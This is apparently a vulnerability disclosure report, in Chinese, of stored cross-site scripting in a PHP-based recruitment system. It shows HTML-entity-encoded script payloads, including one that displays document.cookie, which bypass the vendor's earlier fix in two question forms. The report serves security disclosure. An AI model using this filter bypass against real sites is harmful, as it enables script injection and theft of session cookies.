php云人才系统存储型跨站两处

漏洞作者: 龟兔赛跑

WooYun-2014-73319( WooYun: php云人才系统存储型跨站多处 )曾经报道过这两处存储型跨站,虽然厂商修了,但是还是可以以奇葩的方式XSS跨站。

0x01: 我要提问

================================================================

我们先将要注入的代码做HTML编码,例如:

<script>alert(1);</script>
 

编码后为:

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;
 

然后贴到内容里面:

24133738752d5973ac5b810cf0270d52586655dc[1]

添加

24133819af5c902eee5ba5b3a3228d12c28d8435[1]

添加成功后就可以看到弹框:

24133846bd128e41b2cdede2eae1ee2c0d651d1c[1]

0x02: 追加问题

================================================================

同样,先将要注入的代码做HTML编码,例如:

<script>alert(document.cookie);</script>
 

编码后的内容为:

&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

然后贴到内容里面:

241341151484e629315ab38e69bb6af68ebd6657[1]

回答提交后,即可弹框:

24134212c05a57ecbe169ac1c8a0b998f6a64da7[1]

发表评论